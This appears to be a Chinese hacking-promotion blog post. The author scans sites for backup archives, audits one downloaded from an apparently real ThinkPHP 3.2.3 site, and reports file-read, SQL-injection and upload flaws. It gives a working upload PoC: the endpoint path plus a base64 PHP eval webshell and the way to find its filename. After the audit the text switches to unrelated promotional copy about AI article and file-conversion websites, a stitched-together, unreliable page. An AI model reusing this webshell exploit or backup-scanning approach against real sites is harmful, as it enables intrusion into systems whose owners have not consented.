迎搜索公众号：白帽子左一

每天分享更多黑客技能，工具及体系化视频教程（免费领）

因为自己一直在学习用python编写小工具，然后看到了一些文章关于扫描网站后台备份文件的脚本

我就参照着写了好久的脚本代码，都是低效率代码

然后勉强算是写好了，运行了一下

哎、查看结果还真扫出来了两个包，还是有点用的

好了进入正题：

一、框架分析

解压发现，目录有thinkphp，在tp的基础上进行的二次开发，tp存在的漏洞肯定存在！

（因为一些文件的名字可以找到该模板、所以打码了）

查看一下tp的版本:3.2.3

Tp3.2.3 可能存在缓存漏洞、sql注入漏洞，sql注入暂时放放，缓存漏洞看看有没有。

参考一下：

https://www.bilibili.com/read/cv10345589?from=search

要存在漏洞的话，肯定需要调用tp框架的Cache：：set方法，查找全局，看有没有调用。可惜没有调用，那就凉了。

二、网站结构分析

一键开启自动审计！

趁着这个时间大致浏览了一下网站的结构，它没有把全部功能写到controller里面

没有将index.php作为唯一的入口文件，可以访问其他文件进入其他控制器

它采用tp的URL_MODEL=0的模式，index.php对m传参进行清洗

网站如果访问index.php默认访问Home模块的index控制器。

而想进入后台，则要找到入口文件××.php，它的m值为默认Admin、进入admin模块。

所以要进后台，如果××.php没有改变的话，那么访问××.php就可以了。

三、漏洞代码审计

（一）、傻瓜式漏洞

明显的任意文件读取漏洞，而且出错可以报出网站根目录。

这个找到敏感信息便可以读取。

数据库账号密码就来了~

（二）、后台登录sql注入

什么？？直接拼接post的值，实锤sql注入，但是不能万能钥匙登录

因为无论如何都要验证加密了的password是否正确，幸运的是这里可以用显错注入

上sqlmap跑一下就可以了。
或者添加一个用户，进入后台搞事情嘻嘻嘻。

这里暂时先不进去，看看前台有什么可以搞的。

（三）、前台sql注入

一堆sql注入，我不一一验证了，各位大佬们肯定能一眼看出来，比如以下：

都没有过滤，而且又没有使用tp的自带函数，那就凉了嘛。

（四）、前台文件上传漏洞

经过不懈的努力，终于找到了一个文件上传的漏洞，这道题有点像ctf，

看来还是要多做点ctf的题呀，多练练思维。

以下为漏洞代码：

    /**
     * 公共上传图片方法
     */
    public function Upload(){
        $base64_image_content=I("post.img");
        $image_name=I("post.name");
        $len=I("post.size");
        $baseLen=strlen($base64_image_content);
        if($len!=$baseLen)  $this->error("上传图片不完整");
        if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)){
            $uploadFolder=C('UPLOADPATH').date("Ymd")."/";
            if(!is_dir($uploadFolder)){
                if(!mkdir($uploadFolder, 0755, true)){
                    $this->error('创建文件失败');
                }
            }
            $type=$result[2];
            if(empty($image_name)){
                $new_file=$uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
            }else{
                $new_file=$uploadFolder.$image_name."_".date("mdHis").".{$type}";
            }
            $img_64=base64_decode(str_replace($result[1], '', $base64_image_content));
            if (file_put_contents($new_file,$img_64)){
                $this->success(complete_url($new_file));
            }
        }else{
            $this->error("图片不存在");
        }
    }
}

由图可知，代码使用tp框架的函数I() 来获取数据，具有一定的安全性，它的函数实现了html实体转化。

但是呢，这里他使用了base64的编码进行输入，所以<>都可以生效。

接下来看一下满足的条件：

1.Size的post传参和$baseLen数据长度一样，也就是size就是img传参的长度。
2.preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)//只要输入的img满足data: image/jpg;base64, 就能匹配出三个结果：

3.是否存在目录。（肯定有的~）

代码往下走就是：$type=$result[2];

也就是说type是文件后缀，那让result[2]=php不就完美了？

于是就有：data: image/php;base64

再接着这段代码：

    if(empty($image_name)){
        $new_file=$uploadFolder.date("His")."_".mt_rand(0, 1000).".{$type}";
    }else{
        $new_file=$uploadFolder.$image_name."_".date("mdHis").".{$type}";
    }
    $img_64=base64_decode(str_replace($result[1], '', $base64_image_content));
    if (file_put_contents($new_file,$img_64)){
        $this->success(complete_url($new_file));
    }
    }else{
        $this->error("图片不存在");
    }

判断有无name传参，有就拼接目录、时间、和$type。其中type为后缀，那就OK，可以上传php文件。

最后看一下file_put_contents两个参数，$new_file 为写入的目录文件，$img_64为写入的内容。内容要是一句话木马才行。

$img_64是先进行替代操作str_replace($result[1], ‘’, $base64_image_content)，再进行base64解码。

所以data: image/jpg;base64,之后的内容是一句话木马的base64的加密内容就行。

具体name的传参无关紧要，而size是要等于img的字符长度，即可触发文件上传漏洞。

总结就是，该漏洞因为太相信上传的img文件类型，而触发文件上传漏洞。

综上可得到poc为：

img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==& &name=jpg&size=63

PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==是一句话木马base加密的内容。

其中，要连接一句话木马就要知道时间戳。

本地复现：

上传的文件名是jpg_0430130105.php 文件名不难猜，月日时秒
尝试实操：

url为：http://url/index.php?m=&c=indexAjax&a=upload
poc为：

img=data: image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbMTJdKTs/Pg==&name=jpg&size=63

上传成功，看看效果：

成功。

菜刀就不连了！

开溜是不可能开溜的，后续我还会再尝试一下这个审计一下，若有其他新奇的漏洞代码，我再上传。

心得体会：

我自己通过学习了大约一星期的tp框架，才入门了这个审计

我觉得、不一定自己要有多懂代码、不一定要非得自己写一个网站

但是框架里面的应用包括内置函数这些一定要懂！

这就像一个手机app一样，基本的操作方法会了之后，你就可以找出这个app有哪些小bug。

但是像大佬一样，审计框架里的内容，那可能还有很远的路要走，一起加油吧！

什么选择转换AI文章网站？

转换AI文章网站是一个方便快捷的工具，可以帮助用户将文本内容转换为符合要求的格式。无论是写作、翻译还是编辑，转换AI文章网站都能够提供高效的服务。它不仅简化了繁琐的排版过程，还能够提高工作效率。

如何使用转换AI文章网站？

使用转换AI文章网站非常简单。首先，用户只需访问该网站，并将需要转换的文本粘贴到指定区域。接下来，用户可以根据需要选择不同的格式选项，例如标题样式、字体大小、段落间距等。最后，点击“转换”按钮即可获得符合要求的格式化文本。

转换AI文章网站有哪些功能？

1.自定义样式：用户可以根据自己的需求选择不同的样式选项，包括字体、颜色、对齐方式等，以使文章更具个性化。

2.多语言支持：转换AI文章网站不仅支持中文，还支持多种其他语言的文本转换，满足不同用户的需求。

3.快速转换：转换AI文章网站提供快速转换功能，无需等待很长时间即可获得转换后的结果，节省用户的时间。

4.格式自动调整：无论用户输入的原始文本是什么样式，转换AI文章网站都能够自动调整格式，并确保转换后的文本符合要求。

5.导出选项：用户可以选择将转换后的文本导出为HTML、PDF或纯文本格式，以便在不同场景下使用。

6.免费使用：转换AI文章网站是免费的，用户无需支付任何费用即可享受到高质量的转换服务。

有关隐私和数据安全问题

对于用户关心的隐私和数据安全问题，转换AI文章网站采取了一系列措施来保护用户的个人信息和数据。所有用户上传的文本将在转换完成后立即删除，不会被用于其他目的或与第三方分享。同时，该网站也采用了严格的安全措施来保护服务器和用户数据的安全。

如何联系转换AI文章网站的技术支持？

如果您在使用转换AI文章网站的过程中遇到任何问题或有任何建议，您可以通过网站上提供的联系方式与我们的技术支持团队取得联系。我们将竭诚为您解答问题并提供帮助。

通过转换AI文章网站，您可以轻松、快捷地将文本内容转换为符合要求的格式。无论是写作还是编辑，它都能够帮助您提高工作效率，使您的文章更加专业和吸引人。赶快体验一下吧！

参考资料：

1.转换AI文章网站官方网站：。

家在办工过程中是否会存在格式转换的需求，之前也聊过对PDF格式文件的编辑与转换，但在工作中肯定会需要转换不同格式的文档、图片、音频等文件。可一般公司的电脑上也不方便下载专门的软件进行转因此介绍以下几个在线格式转换网站，不需要自己另外安装转换软件，也不需要对电脑配置严格要求，一个网站就可以满足基本的工作需要。

1、Convertio

Convertio 基于浏览器并支持所有平台，无需下载与安装任何软件，同时支持超过 300 种不同的文件格式间超过 25600 种不同的转换方式。在操作上只需将文件拖放至页面，选择输出格式并点击“转换”按钮即可。一般在一到两分钟就可以完成转换。同时这个网站支持OCR功能，但超过超过10页的OCR任务就需要开通会员付费使用了。

2、Cloudconvert

超全的在线格式转换网站，支持几乎任何音频、视频、文档、电子书、图像、电子表格或演示文稿格式。界面虽然是英文，操作起来却并不复杂，但是网页有时会打不开。另外在使用时也不担心内容泄露，网站官方会保证数据安全。

3、ALL To ALL

支持约200多种格式的文件转换，包括：视频、音频、图片、字体等多媒体文件，以及常见的office文件、PDF、电子书等文档。最大可支持10M的文件，适合简单的文件格式转换工作。

4、office converter

Office-converser同样也是一个在线格式转换网站，里面能够转换文档、图片、音乐、视频，甚至提供Youtube视频下载、在线二维码生成等多样的功能。但是相比其他转换网站，非会员用户支持文档文件只有3M，视频文件50M，大文件转换就无法免费了。

5、转转大师

转转大师虽然没有其他几个支持那么多格式转换，但在PDF格式转换上还是不错的，它提供PDF与WORD、EXCEL、HTML、CAD等之间的转换，同时也有简单的PDF编辑功能。如果不开通会员，上传文件的大小同样仅限于30M，所以如果是更大的文件，就需要考虑其他转换工具了。

在线格式转换网站虽然方便，但是在免费使用的前提下，基本上只支持10M以内的小文件，能够满足日常使用。但是如果需要批量处理的大文件格式转换，就需要用到专门的格式转换软件，这个先挖个坑，留到下次说，有兴趣可以持续关注。